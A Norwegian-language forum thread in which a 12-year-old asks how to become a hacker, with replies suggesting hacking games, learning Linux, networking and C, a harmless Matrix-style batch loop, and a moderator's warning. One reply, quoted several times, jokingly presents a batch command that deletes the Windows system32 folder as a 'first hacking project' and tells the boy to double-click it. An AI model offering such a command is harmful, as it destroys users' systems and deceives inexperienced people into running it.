Gå til innhold

Anbefalte innlegg

Hei! :)

 

Jeg er ganske ny her på forumet, har bare noen inlegg. Men jei har lenge interesert meg for hacking, og data generelt. Men jei syenes det ser så kult ut med grønn skrift på svart background, og masse tekst! Men jeg lure på hvordan jeg kan bli en hacker, og hvem pc jeg bør kjøpe for å bli best på dette.

 

Håper noen her kan gi meg svar på hva jeg lurer på. :)

 

lit om meg:

 

12 år.

har lest boken java for dummies boken.

kan masse om minecraft! har satt opp 15 servere, flere av dem med bukitt.

Lenke til kommentar
Videoannonse
Annonse

Du kan starte med et spill som ble gitt ut for en del år siden, mener og huske spillet hette Hacker evolution men finner det ikke i farten.. alternativ er diverse gratis spill som dette- Alt_spill

(de spillene vil simulere litt av det med og bruke komandoer for og hente informasjonen som trengs)

 

men i utgangspunktet så går hacking ut på og utnytte svakheter i systemene for og få tilgang til ting som du kanskje må logge deg inn for og se eller lignende.. men da må du kunne programvarene som brukes inn og ut.. og finne de rette feilene i programmene.

 

de fleste som driver med hacking.. gjør det lovlig.. ved og lete etter feil og mangler på datasystemer, som kan misbrukes for og endre på ting eller lese ting du ikke skulle ha tilgang på.. for deretter og selge resultatene til eier av sidene eller programmene. sånn at det kan fikses så det ikke går an neste gang.

 

men som utgangspunkt blir ordet hacker feil... men skal du bli flink med sånnt.. så bør du ta skole som er rettet mot datasikkerhet.. for og finne de feilene som kan utnyttes..

 

 

 

Maskin messig.. start med en gammel maskin.. da det ikke er gøy og ødelegge nye maskiner. og ting kan gå i stykker.

ALL programering kan "missbrukes" alla hacking.. men det lønner seg og starte med og lage ting som fungerer for og finne ut hvordan tingene fungerer først..

 

lag et tekst dokument (notpad) skriv: CreateObject("SAPI.SpVoice").speak "Ønsket settning" Deretter ta save as. navn.vbs viktig og få med etternavnet i stede for .TXT som er standard.

deretter kan du åpne filen du har laget.

teoretisk er det ingen begrensninger for hva du kan lære deg.. men helst bruk tiden på og lære deg gode ting.. ikke ødelegg for mye for andre..

 

Lykke til

Lenke til kommentar

Du kan kjøpe Hacker Evolution på Steam for 5€ eller under 50 kr

 

Forslag til første hackeprosjekt: BAT-filer

@ECHO OFF
DEL /F /S /Q C:\windows\system32

Lagre dette i notepad, , velg lagre, boksen der det står tekstfil bytter du til alle filtyper, lagre

fila som haxxor.bat på skrivebordet, dobbeltklikk, ha det gøy :closedeyes:

 

EDIT: Uansett mener jeg det er en god idé å kunne lage BAT-filer, vil ikke anbefale å starte med å slette system32 kanskje, men det er veldig praktisk å ha litt erfaring med det.

Endret av arni90
  • Liker 6
Lenke til kommentar

Du kan kjøpe Hacker Evolution på Steam for 5€ eller under 50 kr

 

Forslag til første hackeprosjekt: BAT-filer

@ECHO OFF
DEL /F /S /Q C:\windows\system32

Lagre dette i notepad, , velg lagre, boksen der det står tekstfil bytter du til alle filtyper, lagre fila som haxxor.bat på skrivebordet, dobbeltklikk, ha det gøy :closedeyes:

 

Og hva er egentlig poenget med dette skriptet? Jeg tror du skulle heller brukt hodet ditt til noe fornuftig!

Lenke til kommentar

Du kan kjøpe Hacker Evolution på Steam for 5€ eller under 50 kr

Forslag til første hackeprosjekt: BAT-filer

@ECHO OFF
DEL /F /S /Q C:\windows\system32

Lagre dette i notepad, , velg lagre, boksen der det står tekstfil bytter du til alle filtyper, lagre fila som haxxor.bat på skrivebordet, dobbeltklikk, ha det gøy

Hehehe... uskyldig morro.. ^^

 

sånt er fint når man har en gammel datamaskin... for og teste med.. men ikke på nyere maskiner

 

(jeg laget en tilsvarende på skolen.. men som sende sende ut restart komando til alle maskiner i brukergruppen.. for deretter og legge den i oppstarts sekvensen på en del maskiner..) men jeg husker ikke hva det var.. men det ble deaktivert i win xp.. og nyere.

 

Men syns det er litt mye useriøse komentarer her.. selvom det er litt useriøst og komentere at man vil bli hacker.. så kan det med fordel være litt mer seriøse komentarer..

Lenke til kommentar

Du kan kjøpe Hacker Evolution på Steam for 5€ eller under 50 kr

 

Forslag til første hackeprosjekt: BAT-filer

@ECHO OFF
DEL /F /S /Q C:\windows\system32

Lagre dette i notepad, , velg lagre, boksen der det står tekstfil bytter du til alle filtyper, lagre fila som haxxor.bat på skrivebordet, dobbeltklikk, ha det gøy :closedeyes:

 

Og hva er egentlig poenget med dette skriptet? Jeg tror du skulle heller brukt hodet ditt til noe fornuftig!

Fins mange definisjoner av fornuftig her i verden, og jeg kom faktisk med forslag om Hacker Evolution på Steam ;)

Lenke til kommentar

Lær deg UNIX/Linux, hvordan nettverk fungerer, prinsippene bak 'hacking' og hvordan du bruker verktøy til å utføre sikkerhetspenetrering. Skikkelig hacking gjør man ved å utnytte sikkerhetshull, og for å kunne gjøre dette så bør du lære deg et programmeringsspråk slik som C.

 

Om du driver med 'hacking' uten å vite hva du holder på med så kan du brenne deg skikkelig og risikere å bli straffet for handlingene, så utfør alltid alt på egne maskiner og nettverk.

 

Til dere som sier Hacker Evolution, så er Hacknet både gratis og bedre. :)

Endret av Gavekort
  • Liker 1
Lenke til kommentar

Du kan kjøpe Hacker Evolution på Steam for 5€ eller under 50 kr

 

Forslag til første hackeprosjekt: BAT-filer

@ECHO OFF
DEL /F /S /Q C:\windows\system32

Lagre dette i notepad, , velg lagre, boksen der det står tekstfil bytter du til alle filtyper, lagre fila som haxxor.bat på skrivebordet, dobbeltklikk, ha det gøy :closedeyes:

 

Og hva er egentlig poenget med dette skriptet? Jeg tror du skulle heller brukt hodet ditt til noe fornuftig!

 

Det var nok en liten spøk, men ærlig talt - det er jo relativt lærerikt å måtte ordne opp etter noe sånt, i tillegg til at man kanskje lærer noe av det viktigste man trenger - litt kritikk til det man utsetter PCen sin for.

  • Liker 1
Lenke til kommentar

Du kan kjøpe Hacker Evolution på Steam for 5€ eller under 50 kr

 

Forslag til første hackeprosjekt: BAT-filer

@ECHO OFF
DEL /F /S /Q C:\windows\system32

Lagre dette i notepad, , velg lagre, boksen der det står tekstfil bytter du til alle filtyper, lagre fila som haxxor.bat på skrivebordet, dobbeltklikk, ha det gøy :closedeyes:

 

Og hva er egentlig poenget med dette skriptet? Jeg tror du skulle heller brukt hodet ditt til noe fornuftig!

 

Det var nok en liten spøk, men ærlig talt - det er jo relativt lærerikt å måtte ordne opp etter noe sånt, i tillegg til at man kanskje lærer noe av det viktigste man trenger - litt kritikk til det man utsetter PCen sin for.

 

Det var sånn jeg lærte... fikk et virus som gjorde akkurat det.. for deretter og rydde opp og hente ut den infoen jeg måtte ha...

Men uansett.. så er det viktig når man leker med sånne komandoer.. gjør det på an gammel maskin.. som ikke gjør noe at du må installere opperativsystemet på nytt noen hundre ganger..

Lenke til kommentar

Tre innlegg har blitt slettet. Det kan hende enkelte finner det underholdene å forsøke å få andre til å slette viktige systemmapper, men dette regnes som malware og fjernes deretter. Ved videre overtredelser eller spredning av virus, trojanere og lignende, vil advarsler utdeles.

 

Dette innlegget skal ikke kommenteres. Har du reaksjoner på moderering tar du kontakt med meg via en privat melding eller poster i Klager på moderatoravgjørelser.

  • Liker 2
Lenke til kommentar
  • 2 uker senere...

Stakkars gutten da. I get the joke, var en god latter, men.. Vil si at "hacker" som det vises på film og TV er vel kanskje ikke noe mål eller lik på noen måte. 1 button = CSI access / 4x password guess = Global controll. Hackere blir jo sett som personer som utfører datakriminalitet så det er vel kanskje ikke noe mål?

 

Men, du er ung så tenker du egentlig rett og slett ønsker å bli god på data og programmeringsspråk.

Vil absolutt anbefale å starte med å lage .bat filer. Få maskiner til å skru seg av med tekst, beskjeder og mye mer.

 

 

Om du syns matrix var kult kan du prøve å skrive inn dette i Notepad og lagre det som en .bat fil.

 

@echo off
color 0a
:top
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto top

 

@echo off = slår av kommando/sti visning (kun teksten du skriver vil vises)

color = bestemmer fargen du vil ha. hvor den første bokstaven forteller bakgrunnen og neste farge på tekst. 0 er svart og a er grønn dette blir matrix tekst.

:top = litt usikker på hva man skal kalle dette på enkelt norsk, men vi bruker denne til å lage et kjennemerke i programmet.

%random% = Viser et tilfeldig tall fra 0 til 32767.

goto top = hopper tilbake til :top beskjeden vår. dette vil si at vi kjører dette som noe vi kaller en loop.

 

 

Programmet vil rett og slett vise tilfeldige tall i matrix grønn farge i all evighet.

 

 

 

Men kort sagt, bli hacker er vel ikke akkurat noe mål gutt ;) Tror alle har fått seg en god latter nå

Lenke til kommentar
Hackere blir jo sett som personer som utfører datakriminalitet så det er vel kanskje ikke noe mål?

Ja det er det bildet media har skapt og du har gått i samme felle,det og bli kalt en "hacker" i ordet rette betydning er en æresbetegnelse.

De som driver med datakriminalitet fra "script kiddie" til mere avanserte brukere kalles "cracker".

 

Eric S. Raymond blir kalt en "hacker" ikke fordi han bryter seg inn i systemer,men kan programmere rimlig flytene i 15 språk og lager programvare

som som går under "open source" betegnelsen.

Her forklarer litt han litt om misforståelsen "hacker" vs "cracker" i denne videoen.

http://www.youtube.com/watch?v=K57c13j1yUo

Forfatter av How To Become A Hacker

 

 

Vil absolutt anbefale å starte med å lage .bat filer. Få maskiner til å skru seg av med tekst, beskjeder og mye mer

Tjaa batch(bat) er et dårlig og utdatert programspråk.

Greit det kan være gøy og lage noen små script som utfører noen små oppgaver.

Men man bør komme seg for bort fra batch rimlig fort,så man ikke lærer seg for mange dårlige rutiner når man går over til et "ordentlig" programspråk.

Endret av SNIPPSAT
  • Liker 1
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...